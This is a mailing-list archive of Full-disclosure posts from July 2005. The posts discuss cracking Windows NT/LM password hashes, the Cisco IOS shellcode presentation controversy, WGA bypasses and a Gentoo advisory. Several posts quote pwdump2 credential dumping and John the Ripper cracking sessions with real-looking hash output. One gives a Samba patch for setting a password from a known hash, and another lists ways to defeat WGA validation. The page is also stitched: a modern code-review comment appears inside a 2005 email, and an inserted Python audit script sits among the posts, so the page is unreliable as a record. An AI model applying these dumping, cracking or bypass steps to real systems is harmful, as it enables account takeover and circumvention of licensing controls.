Re: [Full-disclosure] Best way to crack NT passwds

2005-07-30 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Yup, this application is probably the best for LM hashes. The main 
problem is then to generate a table like the alphanumsymbol15 one; 
basically it takes a lot of time, around 6 months on only 1 computer 
at 1 GHz. Otherwise you can still find some nice free services such as 
http://milw0rm.com/md5 and some other similar websites, but I guess 
their queue is full. Or the best solution is to look at the official 
rbcrack website; the founder is selling alphanumsymbol15 if I 
remember. Or on 20 computers at 3 GHz you can expect 2 weeks. 'shrink' 
purdue :>


At 15:32 30/07/05, Paul Farrow wrote:
Yup, after I posted that I read your post. Have to admit, searching a 
table full of hashes would be a hell of a lot quicker than cracking 
it manually :]
But then again, I rarely crack any hashes (good memory for my own 
passwords), but anything for md5 I use passcracking.net/com.
But I suppose it wouldn't be difficult to code up a quick PHP page to 
fill a MySQL database with incremental hashes generated on the fly... 
might look into it
(even though it's no doubt been done); fun project for a rainy day I 
suppose.


[EMAIL PROTECTED] wrote:


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

RainbowCrack finds this pass "Test0r" in 5-10 sec and you don't 
need a huge machine to get it. If you like John the Ripper, I 
heavily suggest you generate your tables and start using rbcrack, 
because you are losing your time on John, believe me :)


At 12:25 30/07/05, Paul Farrow wrote:

Chances are the system used by the website was a multi-processor 
beast of a machine, able to maximise CPU time for cracking the 
passwords.
If you can get the password hash, then your best bet is to run it 
through JtR (John the Ripper).


C:\toolkit\passwords\pwdump> pwdump2
Administrator:500:62b239ea3de3b4142e04d2d295f821b0:a929535485de3b5088923fd58d02cca2:::
ASPNET:1000:f5052a93de1b6a7848d83fff52bb5c55:264d62a5f32f74bb6df2642a514fd17f:::
Guest:501:d9dce10ca0c8ba7baad3b435b51404ee:672e556cf53bf2a83c36bead6383212b:::
__vmware_user__:1002:aad3b435b51404eeaad3b435b51404ee:69deddc712c272b33e31fae0f4b82a73:::

C:\toolkit\passwords\pwdump> pwdump2 > passwords.dump
C:\toolkit\passwords\john>john -incremental passwords.dump
Loaded 4 passwords with no different salts (NT LM DES [24/32 4K])
TEST0R  (Administrator:2)
guesses: 1  time: 0:00:00:20  c/s: 9045001  trying: PMSBRK - HLEYKL


That's on a 1.987 MHz AMD processor in Windows 2000, running about 
30 other things at once.



Hope this helps.

X u r r o n wrote:


hiya!
I have tried many software tools for cracking NTLM hashes, like NC4 
and Cain, and haven't tried Rainbow Crack yet.
Once I had to recover my XP's lost admin password and I spent 
around 1 day, but Cain/NC4 were not able to guess it. Then I 
posted the hashes on some site and it recovered my passwd in 
around 5 min. I want to know which technique they used to crack so 
fast?


Xurron











Re: [Full-disclosure] Cisco IOS Shellcode Presentation

2005-07-30 Thread Steve Friedl
On Sat, Jul 30, 2005 at 05:16:15PM -0400, Micheal Espinola Jr wrote:
> Coercion is simply influence.  You can be coerced into a choice, but
> it's still your choice - regardless of whether people like it or not.

This obliterates any distinction between "coercion" and "persuasion",
so why bother to have separate words? When you claim that "I have a gun
to your head" is the same as "pretty please with sugar on top", you
mark yourself as having a stunning poverty of perspective.

Steve

--- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]


Re: [Full-disclosure] Cisco IOS Shellcode Presentation

2005-07-30 Thread Micheal Espinola Jr
Coercion is simply influence.  You can be coerced into a choice, but
it's still your choice - regardless of whether people like it or not.

On 7/30/05, Steve Friedl <[EMAIL PROTECTED]> wrote:
> On Sat, Jul 30, 2005 at 12:53:49PM -0400, Micheal Espinola Jr wrote:
> > It was Lynn's choice based on his statement to the press - and it was
> > still his choice no matter what the coercion might have been.
> 
> This is a strange conflation of "choice" and "coercion"; most thoughtful
> people consider some level of the latter obliterating the former.
> 
> Steve
> 
> 


-- 
ME2  


Re: [Full-disclosure] Mike Lynn's controversialCiscoSecurity Presentation

2005-07-30 Thread Geo.
> From what I understand (I am writing a major paper on Intellectual Property
> Protection right now, the Joy of being a student) the creator of the data
> has the direct right under Title 17 and the DMCA to determine how the data
> will be used (hence expiring CDR's and DRM).

This is incorrect as far as Title 17 goes: copyright only gives control over
making copies and public performance; there must be a contract for any
additional restrictions. See http://www.theyscrewedusagain.com if you want
some good info for your paper. I would suggest you take a look specifically
at the quote from the 1908 Congress that extended copyright law to cover
music as well; pretty interesting stuff.
http://www.theyscrewedusagain.com/copyrightact1909.htm

Geo.



Re: [Full-disclosure] Lynn Preso.

2005-07-30 Thread William Warren
It will be interesting to see if somebody has camcorder coverage of it 
and if it gets released.


[EMAIL PROTECTED] wrote:

> On Fri, 29 Jul 2005 23:54:31 PDT, [EMAIL PROTECTED] said:
>
> > using microsoft search technologies a mirror was located
> > http://www.securitylab.ru/_Exploits/2005/07/lynn-cisco.pdf
>
> Somehow, I don't think a cease-and-desist court order from a US
> court is going to bother these guys much. ;)






--
My "Foundation" verse:
Isa 54:17  No weapon that is formed against thee shall prosper; and 
every tongue that shall rise against thee in judgment thou shalt 
condemn. This is the heritage of the servants of the LORD, and their 
righteousness is of me, saith the LORD.


-- carpe ductum -- "Grab the tape"
CDTT (Certified Duct Tape Technician)

Linux user #322099
Machines:
206822
256638
276825
http://counter.li.org/


[Full-disclosure] [ GLSA 200507-28 ] AMD64 x86 emulation base libraries: Buffer overflow

2005-07-30 Thread Thierry Carrez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200507-28
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: AMD64 x86 emulation base libraries: Buffer overflow
      Date: July 30, 2005
      Bugs: #100686
        ID: 200507-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The x86 emulation base libraries for AMD64 contain a vulnerable version
of zlib which could potentially lead to execution of arbitrary code.

Background
==========

The x86 emulation base libraries for AMD64 emulate the x86 (32-bit)
architecture on the AMD64 (64-bit) architecture.

Affected packages
=================

    -------------------------------------------------------------------
     Package                          /  Vulnerable  /       Unaffected
    -------------------------------------------------------------------
      1  emul-linux-x86-baselibs           < 2.2               >= 2.2
    -------------------------------------------------------------------
     # Package 1 only applies to AMD64 users.

Description
===========

Earlier versions of emul-linux-x86-baselibs contain a vulnerable
version of zlib, which may lead to a buffer overflow.

Impact
======

By creating a specially crafted compressed data stream, attackers can
overwrite data structures for applications that use the x86 emulation
base libraries for AMD64, resulting in a Denial of Service and
potentially arbitrary code execution.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All AMD64 x86 emulation base libraries users should upgrade to the
latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-emulation/emul-linux-x86-baselibs-2.2"

References
==========

  [ 1 ] GLSA 200507-05
http://www.gentoo.org/security/en/glsa/glsa-200507-05.xml
  [ 2 ] GLSA 200507-19
http://www.gentoo.org/security/en/glsa/glsa-200507-19.xml
  [ 3 ] CAN-2005-1849
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1849
  [ 4 ] CAN-2005-2096
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2096

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200507-28.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0




Re: [Full-disclosure] Mike Lynn's controversial CiscoSecurity Presentation

2005-07-30 Thread Georgi Guninski
On Sat, Jul 30, 2005 at 03:19:47PM +, DAN MORRILL wrote:
> From what I understand (I am writing a major paper on Intellectual Property
> Protection right now, the Joy of being a student) the creator of the data 
> has the direct right under Title 17 and the DMCA to determine how the data 
> will be used (hence expiring CDR's and DRM).
> 
> If data is sent in error that does not limit or otherwise reduce the rights 
> of the data owner, and the data owner can request that the data be removed. 
> The data owner can also request assurances that the data has been removed 
> from all parties that they believe have copies of that data. Cisco in their 
> message has acted according to American law by requesting that all copies 
> of the data that is held in private hands be deleted as they are the acting 
> IP owners along with ISS. Cisco is acting as the agent of the IP owner 
> (much like RIAA and MPAA do for artists and movie makers).
> 
> Their request is quite legal, and at least they were polite about it.
>

oh, the first puppy on this thread, IIRC.

can you broadcast your message outside USA jurisdiction, preferably via
paid commercials?

-- 
where do you want bill gates to go today?


 


Re: [Full-disclosure] Cisco IOS Shellcode Presentation

2005-07-30 Thread Steve Friedl
On Sat, Jul 30, 2005 at 12:53:49PM -0400, Micheal Espinola Jr wrote:
> It was Lynn's choice based on his statement to the press - and it was
> still his choice no matter what the coercion might have been.

This is a strange conflation of "choice" and "coercion"; most thoughtful
people consider some level of the latter obliterating the former.

Steve



Re: [Full-disclosure] Cisco IOS Shellcode Presentation

2005-07-30 Thread Micheal Espinola Jr
It was Lynn's choice based on his statement to the press - and it was
still his choice no matter what the coercion might have been.

Larry had no right to take that choice away, and I doubt anyone
here has the right or the first-hand knowledge to pass
judgement on the reasons for Lynn's choice.

Based on Lynn's statements his motivation was patriotic.  Who are we
to judge that was not his intent for his intellectual property?

I ask you, how do you know it wasn't?

On 7/29/05, Ron DuFresne <[EMAIL PROTECTED]> wrote:
> On Fri, 29 Jul 2005, Micheal Espinola Jr wrote:
> 
> > That was a real dickhead thing to do.  The guy that wrote that made an
> > agreement with Cisco of his own free will.  Who do you think you are
> > to go against an agreement he made, with his own information?
> >
> > I sincerely hope it bites you in the arse.
> >
> 
> Was it free will, or the threat of jail and other difficulties?
> 
> After all, employment was not a show stopper for him; he quit to release
> his findings and gain glory in the crowds at hacker fests.  So was it
> really free will, I ask again?
> 
> Thanks,
> 
> Ron DuFresne
> --
> "Sometimes you get the blues because your baby leaves you. Sometimes you 
> get'em
> 'cause she comes back." --B.B. King
>***testing, only testing, and damn good at it too!***
> 
> OK, so you're a Ph.D.  Just don't touch anything.
> 
> 
> 


-- 
ME2  


[Full-disclosure] Re: Defeating Microsoft WGA Validation Check

2005-07-30 Thread shellcode
ways to get around the WGA check:

1.) http://www.extended64.com/blogs/rafael/archive/2005/07/27/1026.aspx

2.) http://home19.inet.tele.dk/jys05000/

3.) http://www.boingboing.net/2005/07/28/microsoft_genuine_ad.html

4.) a.) install WGA
    b.) in the directory C:\documents and settings\all users\application data\Windows Genuine Advantage\data\
    c.) make the file data.dat read-only

5.) [got more to add?]

don't complain if they don't work (anymore)...

cheers,


Re: [Full-disclosure] Mike Lynn's controversial CiscoSecurity Presentation

2005-07-30 Thread DAN MORRILL
From what I understand (I am writing a major paper on Intellectual Property 
Protection right now, the Joy of being a student) the creator of the data 
has the direct right under Title 17 and the DMCA to determine how the data 
will be used (hence expiring CDR's and DRM).


If data is sent in error that does not limit or otherwise reduce the rights 
of the data owner, and the data owner can request that the data be removed. 
The data owner can also request assurances that the data has been removed 
from all parties that they believe have copies of that data. Cisco in their 
message has acted according to American law by requesting that all copies of 
the data that is held in private hands be deleted as they are the acting IP 
owners along with ISS. Cisco is acting as the agent of the IP owner (much 
like RIAA and MPAA do for artists and movie makers).


Their request is quite legal, and at least they were polite about it.

If anyone wants more data on this subject (which is way off topic for FD), I 
can provide it separately or as private conversation.


Regards,
Dan



Sometimes MSN E-mail will indicate that the message failed to be delivered. 
Please resend when you get those; it does not mean that the mail box is bad, 
merely that MSN mail is overworked at the time.







From: Daniel <[EMAIL PROTECTED]>
Reply-To: Daniel <[EMAIL PROTECTED]>
To: Russell Smoak <[EMAIL PROTECTED]>
CC: full-disclosure@lists.grok.org.uk, nanog@merit.edu, 
[EMAIL PROTECTED]
Subject: Re: [Full-disclosure]  Mike Lynn's controversial 
CiscoSecurity Presentation

Date: Sat, 30 Jul 2005 00:24:33 +0100

This raises an interesting point, if intellectual property is sent in
error, do any of the laws pertaining to said property apply 100% or is
there a weird shift of how they are applied?





On 7/29/05, Russell Smoak <[EMAIL PROTECTED]> wrote:
> All,
>
> These recipients received an email from Austin Mckinley as Cisco Systems.
>
> This message was sent in complete error and includes intellectual
> property of ISS and Cisco Systems.  Please delete and do not distribute
> the information any further.
>
> If you have any questions, please contact the Cisco PSIRT team.
>
>
> Thank you for your cooperation.
>
>
>
> --
> Russell Smoak  <[EMAIL PROTECTED]>
> Sr. Manager, PSIRT
> Customer Assurance Programs
> c i s c o S y s t e m s
> Phone: 615-791-0972
> Cell: 615-545-6473




Re: [Full-disclosure] Cisco IOS Shellcode Presentation

2005-07-30 Thread Geo.
> Anyhow, as for Cisco's DJs spinning "it's only an IPv6 thing, you can all
> go home now...", isn't it humorous to see that IPv6 is supposed to be
> "that much more secure". Obviously I wouldn't believe Cisco when they
> state it's IPv6 based only; don't get me wrong, it's funny to see spin.

A few points.

1) Lynn was put onto this from something he found on a Chinese hacking site.
He hasn't actually said he invented this technique has he?

2) IPv6 is fairly common in Asia, isn't it? The "it's not an issue because
nobody uses IPv6" is a US centric viewpoint.

3) Cisco slipstreamed the patch and did a stealth release. The actual
advisory wasn't released until Lynn did his presentation.

4) If it's such a "who cares" type thing, why did Cisco try to snuff it out?
Obviously Cisco's spin and actions don't match here.

5) Given the above, is it possible that this bug and possibly this technique
of getting root on routers was being used to spy on people? Remember back in
the late 90's when some ISP in McLean VA "accidentally" rerouted half of
Europe through their network, which just happens to be where the CIA
headquarters are?

http://news.com.com/Router+glitch+cuts+Net+access/2100-1033_3-279235.html

This type of exploit would appear to me to be exactly the type of useful
thing that intelligence services would love. Look at the facts: you could
tunnel SMTP and/or HTTP traffic through anywhere you wanted, leaving ICMP
traffic passing the normal routes so that a traceroute shows nothing
suspicious. Could you ask for more?

Geo.



Re: [Full-disclosure] Best way to crack NT passwds

2005-07-30 Thread Paul Farrow
Yup, after I posted that I read your post. Have to admit, searching a 
table full of hashes would be a hell of a lot quicker than cracking it 
manually :]
But then again, I rarely crack any hashes (good memory for my own 
passwords), but anything for MD5 I use passcracking.net/com.
But I suppose it wouldn't be difficult to code up a quick PHP page to 
fill a MySQL database with incremental hashes generated on the fly... might 
look into it

(even though it's no doubt been done); fun project for a rainy day I suppose.

[EMAIL PROTECTED] wrote:



Rainbow crack finds this pass "Test0r" in 5-10 sec and you don't need 
a huge machine to get it. If you like John the Ripper, I heavily 
suggest you generate your tables and start using rbcrack, because 
you are losing your time on john, believe me :)


At 12:25 30/07/05, Paul Farrow wrote:

Chances are the system used by the website was a multi-processor 
beast of a machine, able to maximise CPU time for cracking the passwords.
If you can get the password hash, then your best bet is to run it 
through jtr (John the Ripper).


C:\toolkit\passwords\pwdump> pwdump2
Administrator:500:62b239ea3de3b4142e04d2d295f821b0:a929535485de3b5088923fd58d02cca2:::
ASPNET:1000:f5052a93de1b6a7848d83fff52bb5c55:264d62a5f32f74bb6df2642a514fd17f:::
Guest:501:d9dce10ca0c8ba7baad3b435b51404ee:672e556cf53bf2a83c36bead6383212b:::
__vmware_user__:1002:aad3b435b51404eeaad3b435b51404ee:69deddc712c272b33e31fae0f4b82a73:::

C:\toolkit\passwords\pwdump> pwdump2 > passwords.dump
C:\toolkit\passwords\john>john -incremental passwords.dump
Loaded 4 passwords with no different salts (NT LM DES [24/32 4K])
TEST0R  (Administrator:2)
guesses: 1  time: 0:00:00:20  c/s: 9045001  trying: PMSBRK - HLEYKL


That's on a 1.987 MHz AMD processor in Windows 2000, running about 30 
other things at once.



Hope this helps.

X u r r o n wrote:


hiya!
I have tried many software tools for cracking NTLM hashes, like NC4 and 
Cain, and haven't tried Rainbow Crack yet.
Once I had to recover my XP's lost admin password and I spent around 
1 day, but Cain/NC4 were not able to guess it. Then I posted the 
hashes on some site and it recovered my passwd in around 5 min. I 
want to know which technique they used to crack so fast?


Xurron



Re: [Full-disclosure] Cisco IOS Shellcode Presentation

2005-07-30 Thread lsi
> Just store the program in a frikking *ROM*, and disallow execution of
> opcodes from RAM.  It's called a Harvard architecture.

The problem with this will be speed, will it not?  It could be cached 
into RAM - but then it would be modifiable ... 

I also have a query relating to the assertion by Lynn that worms 
would be difficult to make, because different firmware has different 
offsets.  Surely this would be as simple as looping through a list:

if (firmware == x) { attackstring = ABC }
elseif (firmware == y) { attackstring = DEF }
elseif (firmware == z) { attackstring = GHI }
...
etc

Finally, I note from the narrative on tomsnetworking that while the 
presentation did not describe exactly how to make an attack script 
that gets root, it nonetheless showed off exactly that.  "At the 
beginning of his talk, Michael Lynn connected to a Cisco router, ran 
his shell script and obtained the "enable" prompt." [1]  

I thus conclude it's only a matter of time before an "autorooter" is 
developed for use against a wide variety of routers.

The window of vulnerability, which is at least three weeks old, 
opened wide on the 27th, and remains so.  No amount of legal 
posturing by anybody can change this.

[1] http://www.tomsnetworking.com/Sections-article131-page4.php

---
Stuart Udall
stuart [EMAIL PROTECTED] net - http://www.cyberdelix.net/

--- 
 * Origin: lsi: revolution through evolution (192:168/0.2)



Re: [Full-disclosure] Best way to crack NT passwds

2005-07-30 Thread [EMAIL PROTECTED]


Rainbow crack finds this pass "Test0r" in 5-10 sec and you don't 
need a huge machine to get it. If you like John the Ripper, I heavily 
suggest you generate your tables and start using rbcrack, because 
you are losing your time on john, believe me :)


At 12:25 30/07/05, Paul Farrow wrote:
Chances are the system used by the website was a multi-processor 
beast of a machine, able to maximise CPU time for cracking the 
passwords.
If you can get the password hash, then your best bet is to run it 
through jtr (John the Ripper).


C:\toolkit\passwords\pwdump> pwdump2
Administrator:500:62b239ea3de3b4142e04d2d295f821b0:a929535485de3b5088923fd58d02cca2:::
ASPNET:1000:f5052a93de1b6a7848d83fff52bb5c55:264d62a5f32f74bb6df2642a514fd17f:::
Guest:501:d9dce10ca0c8ba7baad3b435b51404ee:672e556cf53bf2a83c36bead6383212b:::
__vmware_user__:1002:aad3b435b51404eeaad3b435b51404ee:69deddc712c272b33e31fae0f4b82a73:::

C:\toolkit\passwords\pwdump> pwdump2 > passwords.dump
C:\toolkit\passwords\john>john -incremental passwords.dump
Loaded 4 passwords with no different salts (NT LM DES [24/32 4K])
TEST0R  (Administrator:2)
guesses: 1  time: 0:00:00:20  c/s: 9045001  trying: PMSBRK - HLEYKL


That's on a 1.987 MHz AMD processor in Windows 2000, running about 30 
other things at once.



Hope this helps.

X u r r o n wrote:


hiya!
I have tried many software tools for cracking NTLM hashes, like NC4 
and Cain, and haven't tried Rainbow Crack yet.
Once I had to recover my XP's lost admin password and I spent around 
1 day, but Cain/NC4 were not able to guess it. Then I posted the 
hashes on some site and it recovered my passwd in around 5 min. I 
want to know which technique they used to crack so fast?


Xurron



Re: [Full-disclosure] Cisco IOS Shellcode Presentation

2005-07-30 Thread Pavel Kankovsky
On Fri, 29 Jul 2005, Frank Knobbe wrote:

> That means that the once thought-to-be-invulnerable boxes running IOS
> are in fact as vulnerable as a Windows boxes. Once you get process
> control, you can do whatever you like.

Hmm...the fact Cisco uses general purpose CPUs (e.g. PowerPC 4xx) in their
box has been shamelessly announced by "show version" for years. Perhaps
they should sue themselves?

The presentation is nice but it does not reveal anything you cannot find 
out yourself with a Cisco box to play with and a little bit of ingenuity.

But I can understand why they make so much fuss about it. Lynn told the 
people the emperor wears no clothes. Emperors always freak out when it 
happens.

> (What is TCB anyway? Certainly not Trusted Computing Base :)

No. It's Transmission Control Block. See RFC 793 "Transmission Control
Protocol".

"I don't know what this stands for, and neither did the people at Cisco I
spoke with", esp. the 2nd part, is something I find rather unbelievable.
Perhaps Lynn did not talk to the right people at Cisco. Or perhaps Cisco
has already finished its transformation to the modern kind of business and
got rid of anyone with a clue?

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."



Re: [Full-disclosure] Best way to crack NT passwds

2005-07-30 Thread Paul Farrow
Chances are the system used by the website was a multi-processor beast 
of a machine, able to maximise CPU time for cracking the passwords.
If you can get the password hash, then your best bet is to run it 
through jtr (John the Ripper).


C:\toolkit\passwords\pwdump> pwdump2
Administrator:500:62b239ea3de3b4142e04d2d295f821b0:a929535485de3b5088923fd58d02cca2:::
ASPNET:1000:f5052a93de1b6a7848d83fff52bb5c55:264d62a5f32f74bb6df2642a514fd17f:::
Guest:501:d9dce10ca0c8ba7baad3b435b51404ee:672e556cf53bf2a83c36bead6383212b:::
__vmware_user__:1002:aad3b435b51404eeaad3b435b51404ee:69deddc712c272b33e31fae0f4b82a73:::

C:\toolkit\passwords\pwdump> pwdump2 > passwords.dump
C:\toolkit\passwords\john>john -incremental passwords.dump
Loaded 4 passwords with no different salts (NT LM DES [24/32 4K])
TEST0R  (Administrator:2)
guesses: 1  time: 0:00:00:20  c/s: 9045001  trying: PMSBRK - HLEYKL


That's on a 1.987 MHz AMD processor in Windows 2000, running about 30 
other things at once.



Hope this helps.

X u r r o n wrote:


hiya!
I have tried many software tools for cracking NTLM hashes, like NC4 and 
Cain, and haven't tried Rainbow Crack yet.
Once I had to recover my XP's lost admin password and I spent around 1 
day, but Cain/NC4 were not able to guess it. Then I posted the 
hashes on some site and it recovered my passwd in around 5 min. I 
want to know which technique they used to crack so fast?


Xurron



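A defender-side check that the pwdump listing above invites, added here as an example and not code from any poster, from pwdump2 or from john: it parses the user:RID:LM:NT::: lines and reports what the stored LM hash already gives away (blank password, at most 7 characters, or a case-insensitive 8-14 character password that precomputed tables cover). The two constants are the well-known empty LM half and empty NT hash; the two extra input lines are constructed and marked as such in the code.

```python
"""Audit pwdump-style output for weak Windows credential storage.

Added example for this thread, not code from any poster, pwdump2 or john.
Input is the pwdump2 layout quoted in the thread, one account per line:

    user:RID:LM_hash:NT_hash:::        (each hash is 32 hex characters)

An LM hash is DES over two 7-character halves of the upper-cased
password, so the stored value itself tells a defender a lot.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# An empty 7-character LM half always encrypts to this well-known constant.
EMPTY_LM_HALF = "aad3b435b51404ee"
# NT hash (MD4 of the UTF-16LE password) of the empty password.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

STATUS_BLANK = "blank-password"      # NT hash of the empty string
STATUS_LM_SHORT = "lm-stored-short"  # LM present, password <= 7 characters
STATUS_LM_FULL = "lm-stored"         # LM present, password 8..14 characters
STATUS_NT_ONLY = "nt-only"           # no LM hash stored for this account
STATUS_MALFORMED = "malformed"       # line does not match the layout

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)


@dataclass
class Finding:
    user: str
    rid: Optional[int]
    status: str
    note: str


def classify(lm: str, nt: str) -> Tuple[str, str]:
    """Derive what the stored LM/NT pair reveals about the password."""
    lm, nt = lm.lower(), nt.lower()
    if nt == EMPTY_NT_HASH:
        return STATUS_BLANK, "NT hash is MD4 of the empty string"
    if lm == EMPTY_LM_HALF * 2:
        return STATUS_NT_ONLY, ("LM hash absent (NoLMHash policy, or password "
                                "longer than 14 characters)")
    if lm[16:] == EMPTY_LM_HALF:
        return STATUS_LM_SHORT, ("second LM half is the empty constant: "
                                 "password is at most 7 characters")
    return STATUS_LM_FULL, ("both LM halves populated: case-insensitive 8-14 "
                            "character password, exposed to precomputed tables")


def audit(dump: str) -> List[Finding]:
    """Parse every non-empty line of a pwdump listing into a Finding."""
    findings: List[Finding] = []
    for raw in dump.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            findings.append(Finding(line.split(":", 1)[0], None, STATUS_MALFORMED,
                                    "line does not match user:rid:lm:nt::: layout"))
            continue
        status, note = classify(m["lm"], m["nt"])
        findings.append(Finding(m["user"], int(m["rid"]), status, note))
    return findings


def accounts_with(findings: List[Finding], status: str) -> List[str]:
    """Names of the accounts carrying a given status, in dump order."""
    return [f.user for f in findings if f.status == status]


# The four accounts below are the pwdump2 lines quoted in the thread.
THREAD_DUMP = """\
Administrator:500:62b239ea3de3b4142e04d2d295f821b0:a929535485de3b5088923fd58d02cca2:::
ASPNET:1000:f5052a93de1b6a7848d83fff52bb5c55:264d62a5f32f74bb6df2642a514fd17f:::
Guest:501:d9dce10ca0c8ba7baad3b435b51404ee:672e556cf53bf2a83c36bead6383212b:::
__vmware_user__:1002:aad3b435b51404eeaad3b435b51404ee:69deddc712c272b33e31fae0f4b82a73:::
"""

# Constructed lines (not from the thread): a blank-password account and a
# line that does not fit the layout, to exercise the two remaining paths.
CONSTRUCTED_DUMP = (
    "svc_backup:1003:aad3b435b51404eeaad3b435b51404ee:"
    "31d6cfe0d16ae931b73c59d7e0c089c0:::\n"
    "garbled line with no fields\n"
)

SAMPLE_DUMP = THREAD_DUMP + CONSTRUCTED_DUMP

if __name__ == "__main__":
    for f in audit(SAMPLE_DUMP):
        rid = "-" if f.rid is None else f.rid
        print(f"{f.user:18} rid={rid:<5} {f.status:16} {f.note}")
```

On the thread's own listing, Guest is flagged as a 7-character-or-shorter password and Administrator as an LM-stored 8-14 character one, which matches john recovering TEST0R as the second half of that hash.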


Re: [Full-disclosure] Best way to crack NT passwds

2005-07-30 Thread 3APA3A
Dear X u r r o n,

You needn't actually crack the password if you know your hash, because
the cleartext password is never used in a Windows environment. You could
apply this patch to md4.c from the Samba distribution:

--- md4.c.orig  2004-04-04 11:37:00.0 +0400
  +++ md4.c   2004-10-27 23:01:31.0 +0400
  @@ -130,6 +130,21 @@
  C = 0x98badcfe;
  D = 0x10325476;
  +
  +   if(n == 64){
  +int j;
  +unsigned char * hexd = (unsigned char *)"0123456789ABCDEF";
  +for(j = 0; j<16; j++){
  + if(!strchr(hexd, in[(j<<2)]))break;
  + if(in[(j<<2)+1])break;
  + if(!strchr(hexd, in[(j<<2)+2]))break;
  + if(in[(j<<2)+3])break;
  + out[j] = ((strchr(hexd, in[(j<<2)]) - (char *)hexd)<<4);
  + out[j] ^= (strchr(hexd, in[(j<<2)+2]) - (char *)hexd);
  +}
  +if(j == 16) return;
  +   }
  +
  while (n > 64) {
  copy64(M, in);
  mdfour64(M);
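Review bot: the hex-digit tests `if(!strchr(hexd, in[(j<<2)]))break;` and `if(!strchr(hexd, in[(j<<2)+2]))break;` accept a NUL byte as a digit, because strchr() also matches the string terminator; a zero byte then yields offset 16 in `out[j] = ((strchr(hexd, in[(j<<2)]) - (char *)hexd)<<4);` and a wrong output byte instead of falling through to normal hashing. Guard the byte first, for example `if(!in[k] || !strchr(hexd, in[k])) break;`. Two smaller points: `hexd` is declared `unsigned char *` yet passed to strchr() uncast while the subtraction casts it to `(char *)`, so declare it `const char *` once; and since `hexd` holds only uppercase digits, lowercase hex input is silently hashed as an ordinary password, which either the code should handle by upper-casing first or the instructions below should state. The hunk also needs a comment that any 32-character uppercase-hex password now hashes differently from stock Samba, so this build is a one-off recovery tool and not something to install.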

And change your password with the Samba utilities by entering the NT
password hash (in HEX) instead of the password when prompted.

--Saturday, July 30, 2005, 12:15:47 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

Xurron> hiya!
Xurron> I have tried many software tools for cracking NTLM hashes, like NC4
Xurron> and Cain, and haven't tried Rainbow Crack yet.
Xurron> Once I had to recover my XP's lost admin password and I spent
Xurron> around 1 day, but Cain/NC4 were not able to guess it. Then I posted
Xurron> the hashes on some site and it recovered my passwd in around 5 min. I
Xurron> want to know which technique they used to crack so fast?

Xurron> Xurron


-- 
~/ZARAZA
http://www.security.nnov.ru/



Re: [Full-disclosure] Best way to crack NT passwds

2005-07-30 Thread [EMAIL PROTECTED]


Prolly rainbow crack, often in less than 2 min; it depends then on 
your table size, around 25GB of tables to crack for example an 
alphanumericsymbol15 (with space) NTLM passwd.


At 10:15 30/07/05, X u r r o n wrote:

hiya!
I have tried many software tools for cracking NTLM hashes, like NC4 and 
Cain, and haven't tried Rainbow Crack yet.
Once I had to recover my XP's lost admin password and I spent around 
1 day, but Cain/NC4 were not able to guess it. Then I posted the 
hashes on some site and it recovered my passwd in around 5 min. I 
want to know which technique they used to crack so fast?


Xurron


[Full-disclosure] Best way to crack NT passwds

2005-07-30 Thread X u r r o n
hiya!
I have tried many software tools for cracking NTLM hashes, like NC4 and Cain, and haven't tried Rainbow Crack yet.
Once I had to recover my XP's lost admin password and I spent around 1 day, but Cain/NC4 were not able to guess it. Then I posted the hashes on some site and it recovered my passwd in around 5 min. I want to know which technique they used to crack so fast?
Xurron

Re: [Full-disclosure] Lynn Preso.

2005-07-30 Thread Valdis . Kletnieks
On Fri, 29 Jul 2005 23:54:31 PDT, [EMAIL PROTECTED] said:

> using microsoft search technologies a mirror was located
> http://www.securitylab.ru/_Exploits/2005/07/lynn-cisco.pdf

Somehow, I don't think a cease-and-desist court order from a US
court is going to bother these guys much. ;)

